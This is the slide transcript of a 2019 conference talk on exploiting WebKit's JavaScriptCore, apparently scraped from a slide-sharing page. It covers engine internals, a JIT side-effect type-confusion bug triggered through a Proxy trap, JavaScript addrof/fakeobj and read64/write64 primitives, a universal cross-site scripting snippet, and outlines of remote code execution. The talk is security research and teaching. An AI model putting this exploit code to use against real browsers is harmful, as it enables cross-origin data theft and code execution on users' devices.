Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The Art of WebKit Exploitation

844e33014e005ee84df615e315915e72?s=47 Umang Raghuvanshi
October 10, 2019
Technology
2
3k

The Art of WebKit Exploitation

http://blog.umangis.me/the-art-of-webkit-exploitation/

As presented at BSides Delhi 2019.

844e33014e005ee84df615e315915e72?s=128

Umang Raghuvanshi

October 10, 2019
Tweet

More Decks by Umang Raghuvanshi

See All by Umang Raghuvanshi
844e33014e005ee84df615e315915e72?s=48 ur0
3
2.7k

Other Decks in Technology

See All in Technology
2f710cd36766586d2b6210f2a2be2b97?s=48 0918nobita
0
200
847a328633b1df6b11cc2f72430025e6?s=48 ks91
PRO
0
110
D0f23208dff6d54a2a4305e65af569c8?s=48 shiozaki
0
240
65241d0356dc5a93b0fec68bcf7b42ac?s=48 yumulab
1
120
E163ae0588e154424d78e17672076ef4?s=48 kosugitti
3
430
18f1e3993e9ead63e7a0f70d9eb996bb?s=48 wkm2
0
140
71c9ebde850996d2533c5df4df2c93c6?s=48 opdavies
0
470
7fb060398b26ed622d34921bd64e4f5d?s=48 yoshiakiyamasaki
0
190
79dcb04101764d7bf66f898dd446838e?s=48 tsukubachallenge
0
240
140494d272a4d89883a94fdfdb29dea2?s=48 oracle4engineer
PRO
2
110
6a87c9bfc71c805c3f5f248b359365d3?s=48 mu2in
0
220
F1bcf74c372e3d1b68834eef7163063c?s=48 mlctsd
0
720

Featured

See All Featured
15f2b8221f247985a27a627d2ece72f0?s=48 pauljervisheath
195
16k
Fde6c3a50ca518a909ef35c22c0ee0e4?s=48 destraynor
148
20k
E76911cbe088e5b850d966de3fc7435b?s=48 robhawkes
55
3k
C157b16234f1e75e8eac3698c1d4414a?s=48 ddemaree
273
32k
6bb82b13cda86d3b821fa44100335ddf?s=48 thoeni
6
920
96270e4c3e5e9806cf7245475c00b275?s=48 addyosmani
496
110k
D83926c323d4f9289f947b4b4e76b939?s=48 jensimmons
209
11k
A0517b08532aec8ab2aae3f65d40ad86?s=48 hannesfritz
32
1.1k
C0390e8b11079f8761c0cd3274ed61cb?s=48 productmarketing
11
1.1k
39488f9d172ab92fd352f2cd7b73258d?s=48 mza
82
4.4k
95d9f37115fbb0d13135d0f77132f856?s=48 morganepeng
97
15k
Ded01cdab114abe4ec13511e4c25b9bb?s=48 andyhume
67
4.2k

Transcript

  1. The Art of WebKit Exploitation

  2. @umanghere

  3. whoami • Security Researcher at SecFence, mostly iOS kernel exploitation.

    • Have released kernel exploits publicly. • Member of the Electra jailbreak team. • Also play CTFs for OpenToAll.

  4. struct Talk { 1. WebKit Walkthrough 2. The Bug 3.

    Exploitation };

  5. WebKit Walkthrough

  6. “Know thine enemy.” – Sun Tzu, The Art of War

  7. file webkit • Browser engine. • Powers Safari, MobileSafari, WebkitGTK,

    Nintendo Switch Browser, PlayStation Browser, Tesla entertainment unit and a lot more. • Long-standing browser exploitation favourite. • Receives a ton of security patches. • Gets pwned anyways.

  8. file webkit • Three major components: • WebKit Template Framework

    • WebCore • JavaScriptCore • We will target JavaScriptCore.

  9. whatis JavaScriptCore.framework • Handles JavaScript in WebKit. • Supports almost

    all of ECMAScript 6 (ES6). • Just-in-Time compilation is present on most platforms. • Over 400k lines of C++ code. • Complexity makes it a good target.

  10. Why JavaScriptCore? • Implementing scripting languages is hard. • Heap

    allocations, lifetime and state management. • Correctly implementing JavaScript is even harder. • WebCore is hardened against memory corruption.

  11. •Floats and Doubles •Integers •Pointers •Objects •Arrays

  12. let num = 13.37; • Squeezing maximum information into a

    processor word has always been a focus for almost all browser engines. To do this, the type of a particular variable is encoded into its pointer (or even into the actual value). • Historically there have been two approaches to this: • Pointer Tagging, which is used in the V8 engine, and • NaN Boxing, used in JavaScriptCore. • Floats and doubles in JavaScript are IEEE754 encoded, but during NaN boxing, a linear addition of 2^48 is done on encoding.

  13. let num = 13.37; Memory Range Type 0x0000_0000_0000_0000 — 0x0000_ffff_fffff_ffff

    ??? 0x0001_0000_0000_0000 — 0xfffe_ffff_fffff_ffff Double Precision Floats 0xffff_0000_0000_0000 — 0xffff_ffff_fffff_ffff ??? From a 64-bit perspective, any boxed value outside of
 0x0001_0000_0000_0000 - 0xfffe_ffff_ffff_ffff is NaN.

  14. let num = 13.37; Memory Range Type 0x0000_0000_0000_0000 — 0x0000_ffff_fffff_ffff

    Pointers 0x0001_0000_0000_0000 — 0xfffe_ffff_fffff_ffff Double Precision Floats 0xffff_0000_0000_0000 — 0xffff_ffff_fffff_ffff 32-bit Integers

  15. let num = 0x1337; • Since JSC only handles 32

    bit integers upto 0x7fffffff, an Int32 x is encoded by OR-ing it: 0xffff << 48 | x. • 0x0000_0000_fade_f00d => 0xffff_0000_fade_f00d. • Pointers are also encoded similarly — the top 16 bits are all zeroes. • JSC can therefore only address upto 32,768 GB of virtual memory.

  16. let bool = true; JS constant Value False 0x6 True

    0x7 Undefined 0xA Null 0x2

  17. •Floats and Doubles •Integers •Pointers •Objects •Arrays •JIT

  18. let obj = {}; • JavaScriptCore may allocate objects on

    the heap. These objects are tracked as JSObjects. • Each JSObject inherits from JSCell and optionally has a butterfly pointer. • JSCell contains important metadata about the object.

  19. class JSC::JSCell • Structure ID • Describes the ‘shape’ of

    the object. • Indexing Type • Describes how indexed properties are accessed. • JS Type • Describes the type of the object. • Flags, GC state

  20. JSObject->m_butterfly • JavaScript allows defining properties on an object. •

    let obj = {a: 1, b: 2, c: 3}; // Named properties • let array = [13.37, 13.37]; // Indexed properties • If an object has less than 6 named properties or no indexed properties, the properties are stored inline with the object. • If it has more than 6 properties or any indexed property, named and indexed properties may be stored out of line in a butterfly.

  21. JSObject->m_butterfly • A butterfly is an out-of-line object which stores

    excess named properties and all indexed properties. • The length field consists of two 32-bit integers, vectorLength and publicLength. • The butterfly pointer in a JSObject points to indexed0. indexed0 indexed1 indexed2 length named6 named7 m_butterfly

  22. JSObject->m_butterfly Indexed Properties Named Properties

  23. JSObject->m_butterfly var obj = [ ]; for (let i =

    0; i < 0x100; i++) obj[i] = i; obj.prop = 0xfade; 0xffff00000000fade m_butterfly 0x0000014d00000100 0xffff000000000000 0xffff000000000001 0xffff000000000002 length obj[0] obj[1] obj.prop

  24. JSObject->m_butterfly var obj = [ ]; for (let i =

    0; i < 0x100; i++) obj[i] = i; obj.prop = 0xfade; TAG_INT32(0xfade) m_butterfly 0x0000014d00000100 TAG_INT32(0x0000) TAG_INT32(0x0001) TAG_INT32(0x0002) length obj.prop obj[0] obj[1]

  25. •Floats and Doubles •Integers •Pointers •Objects •Arrays •JIT

  26. let array = []; • Arrays are implemented by the

    JSArray class. • The Indexing Type of the array determines how its indexed properties are accessed. • We will manipulate the Indexing Type to exploit the bug.

  27. let array = []; • let doubleArray = [13.37, 13.38,

    13.39]; // ArrayWithDouble • let intArray = [1337, 1338, 1339]; // ArrayWithInt32 • let objectArray = [{l33t: 1337}, {a: 1}]; // ArrayWithContiguous • let mixedArray = [1337, 13.37, {a: 1}]; // ArrayWithContiguous • let sparseArray = [{}, 1337, 13.37]; // ArrayWithArrayStorage
 sparseArray[1337] = {};

  28. •Floats and Doubles •Integers •Pointers •Objects •Arrays •JIT

  29. m_jit • Compiles JavaScript code into native code that can

    run directly on the processor. • Performs optimisations on emitted code. • Compiled code is inserted on-the-fly using On Stack Replacement (OSR).

  30. m_jit • Functions start execution in the low-level interpreter, LLInt.

    • Has a three-tiered Just-in-Time compiler: • Baseline JIT, • DFG JIT, • and FTL JIT. • JIT compilation is absent on some platforms.

  31. m_jit © Filip Pizlo, All About JavaScriptCore’s Many Compilers

  32. m_jit • Each level of JIT emits optimised native code.

    • Some of the optimisation consists of removing type checks. • The fewer type checks we have to face, the easier exploitation becomes.

  33. JITType::BaselineJIT • Invoked when code has ran more than 200

    times in the LLInt interpreter. • Minimal optimisations, lots of type checks, quick compile time but relatively poor performance. • Makes almost no assumptions.

  34. JITType::DFGJIT • Stands for Data Flow Graph JIT. • Invoked

    when a baseline JITted function is invoked more than 66 times, or a statement is invoked more than 1000 times. • Relatively slower than baseline JIT, code emitted is faster. • One of the key optimisations is to reduce the number of emitted type checks. • Makes some assumptions on object types.

  35. JITType::FTLJIT • Faster-Than-Light*. • Emitted code is well optimised, traditional

    compiler-like optimisations are performed. • Considerable compilation time. • Lots of type assumptions.

  36. Walkthrough Recap • NaN-boxing to encode floats, small integers and

    pointers. • Named properties for objects stored inline or out-of-line in a butterfly. • JITs make several assumptions about the variable types in the emitted code.

  37. What if we could violate these assumptions?

  38. How do we violate these assumptions?

  39. The Bug

  40. None
  41. None
  42. None

  43. Assumptions Considered Harmful • Each JIT tier builds upon several

    assumptions about argument types. • For example, a DFG JIT compiled function may assume that a variable is an array of doubles, and may even emit specialised code for that case. • In case a state change is detected by DFG or FTL JITs, they will bail out to the Baseline JIT. • Problems can arise if these assumptions are violated when the JIT believes they are still valid.

  44. Un-modelled Side Effects Considered Harmful • Functions which perform ‘dangerous’

    operations are marked as side-effecting functions, and executeEffects()/ clobberWorld() is called when they are invoked. • Changing types of variables, changing array bounds, changing prototypes, evals, etc. are considered dangerous. • Several assumptions are invalidated, most importantly those made about the types of all arrays in the graph. • If we could perform the operations without invalidating assumptions, we could trigger a type confusion. This would be considered an un-modelled side effect.

  45. 1 in obj • ECMAScript has an in operator —

    used to check if a property exists on a variable or its prototypes. • let hasOne = 1 in [ 1, 2, 3 ]; // true • DFG JIT implements this operator as the HasIndexedProperty node. • HasIndexedProperty is not (usually) considered a side effecting node.

  46. HasIndexedProperty is not considered a side effecting node But we

    can override HasIndexedProperty using a Proxy Trap.

  47. Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, { has: function() { /* Side

    Effect */ } }); let date = new Date(); date[1] = 1; let result = 1337 in date; Side effect is triggered! Makes sure that GetIndexedProperty is not a NOP

  48. Exploitation

  49. Objectives Remote Code Execution

  50. Objectives Remote Code Execution Memory Manipulation (read64/write64)

  51. Objectives Remote Code Execution Memory Manipulation (read64/write64) Engine State Manipulation

    (addrof/fakeobj)

  52. addrof & fakeobj • addrof returns the address of a

    target object. • Conversely, fakeobj materialises an object at a target address and returns it. • fakeobj does not allocate an object or write to it — it simply creates a reference to a non-existent object at the target address.

  53. let date = new Date(); date[1] = 1; let address

    = 13.37; let jitFunc = () => { doubleArray[0]; let result = 123 in date; address = doubleArray[1]; return result; } for (let i = 0; i < 0x10000; i++) jitFunc(); trigger = true; jitFunc(); print(address); Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, { has: function() { if (trigger) doubleArray[1] = obj; } }); let doubleArray = new Array(13.37, 13.37); let obj = {}; let trigger = false; Array is now ArrayWithContiguous, however, JIT compiled code still assumes it is an ArrayWithDouble. Array is an ArrayWithDouble. Prints 2.190760907e-314 (0x1084bc040) — the address of obj. Force JIT compilation.

  54. Caveat: can only trigger the side effect once.

  55. Challenge: implement addrof & fakeobj in a single shot.

  56. let object = { property_1: 1, property_2: 2, property_3: 3,

    property_4: 4, };

  57. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 1st Inline Property + 0x18 2nd Inline Property + 0x20 3rd Inline Property + 0x28 4th Inline Property Object Pointer

  58. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 1st Inline Property + 0x18 2nd Inline Property + 0x20 3rd Inline Property + 0x28 4th Inline Property Object Pointer

  59. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 Fake Butterfly Length + 0x18 Fake JSCell Header + 0x20 Fake Butterfly Pointer (Points to the fake object) + 0x28 4th Inline Property 1st Inline Property of the fake object Object Pointer

  60. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 Fake Butterfly Length + 0x18 Fake JSCell Header (IndexingType Double) + 0x20 Fake Butterfly Pointer (Points to the fake object) + 0x28 1st Inline Property of the fake object container fake

  61. addrof function addrof(object) { container.property_4 = object; return fake[2]; }

  62. fakeobj function fakeobj(address) { fake[2] = address; return container.property_4; }

  63. A Tale of Two Butterflies • Indexed properties and out

    of line properties are stored in a butterfly. • Value type is entirely controlled by IndexingType of an array. • If we can redirect a butterfly into controlled memory, we can read or mutate memory by getting or setting a property.

  64. JSCell Header Butterfly Pointer victim

  65. JSCell Header Butterfly Pointer victim JSCell Header Butterfly Pointer fakeArray

  66. JSCell Header Butterfly Pointer victim JSCell Header Butterfly Pointer fakeArray

    target +0x8 +0x10 victim.prop length victim[0]

  67. JSCell Header Butterfly Pointer victim JSCell Header Butterfly Pointer fakeArray

    target +0x8 +0x10 victim.prop length victim[0]

  68. let victim = [13.37]; victim.push(13.37); victim.prop = 13.37; let fakeArrayContainer

    = { jsCellHeader: header, // IndexingType ArrayWithDouble butterfly: victim }; let fakeArray = fakeobj(addrof(fakeArrayContainer) + 0x10);

  69. read64 function read64(address) { fakeArray[1] = address + 0x10; return

    victim.prop; }

  70. write64 function write64(address, data) { fakeArray[1] = address + 0x10;

    victim.prop = data; }

  71. Universal Cross-Site Scripting • Cross-origin requests are restricted by default

    and gated by CORS policies. • However, WebKit’s SecurityOrigin allows arbitrary cross- origin requests if the m_universalAccess boolean flag is set. • This never happens in normal operation, however, we can set it ourselves.

  72. Universal Cross-Site Scripting let xhr = new XMLHttpRequest(); const documentAddr

    = addrof(window.document); const p1 = read64(Add(documentAddr, 0x18)); const p2 = read64(Add(p1, 0xa0)); const p3 = read64(Add(p2, 0x8)); const flagAddr = Add(p3, 0x30); let flags = read64(flagAddr); flags.assignAdd(flags, 0x100); write64(flagAddr, flags); xhr.open('GET', 'https://google.com/', false); xhr.send(); document.getElementById('xss').innerText = xhr.responseText;

  73. Universal Cross-Site Scripting

  74. macOS Remote Code Execution • JIT produces native code to

    run on host processor. • Emitted code’s memory page must have RWX permissions. • We can control memory, therefore we can dump shellcode inside the JIT emitted region and execute it. • Shellcode would run within Safari’s sandbox profile.
  75. None

  76. iOS Remote Code Execution • Safari is the only* application

    which can ever create a RWX mapping on iOS. • Several access control changes on JIT pages over the past few years, such as Bulletproof JIT and APRR. • Only specialised functions can now write code to executable pages, so read64/write64 cannot dump shell code into JIT pages. • Memory access isn’t enough for RCE— control flow must be hijacked too.

  77. iOS Remote Code Execution • Return Oriented Programming is a

    code reuse attack — by manipulating a code pointer to point to a chain of gadgets, the specialised JIT writing functions can be called. • We start our ROP chain by overwriting a pointer inside a C++ object’s virtual function table (vtable). • Control Flow Integrity mitigations, such as ARMv8.3 pointer authentication can defeat ROP-based exploits (in theory).

  78. iOS Remote Code Execution • Pointer Authentication is used to

    sign sensitive pointers and small blocks of data.
 
 0x0000_0000_fade_f00d => 0x00f9_c710_fade_f00d • Function return addresses and C++ vtables are also signed. // Sign the return address in X30 with the B key and the SP as the context value. PACIBSP […] RETAB // Verify address in X30 and jump back to it. • If a signed pointer is modified or replaced with an unsigned pointer, the process will crash.

  79. iOS Remote Code Execution • Authenticated pointers can still be

    forged — if a signing gadget can be reached, ROP is possible again. • Signing gadgets may also be lost across versions. • ROP chains are extremely fragile and dependant on both the target device and version. • Attackers must have at least three variants to work around varied silicon-based mitigations across devices.

  80. Takeaways

  81. Browser engines are ridiculously complex and ever-changing.

  82. WebKit will never be perfectly secure.

  83. No software can ever be perfectly secure.

  84. Security tends to improve over time.

  85. Post exploit mitigations can shift goalposts.

  86. Exploitation will always remain a cat-and-mouse game.

  87. Software can be secure enough to make exploitation impractical.

  88. The harder exploitation gets, the more fun it is.

  89. Thanks We’re standing on the shoulders of giants.

  90. Thanks • Luca Todesco (@qwertyoruiop) • Niklas B. (@_niklasb) •

    Samuel Groß (@5aelo) • Secfence

  91. Further Reading* *Totally not an exploit link. Questions? https://blog.umangis.me/the-art-of-webkit-exploitation/ BSides

    Delhi 2019. v1.0-rc4 (96a401d2/PUB)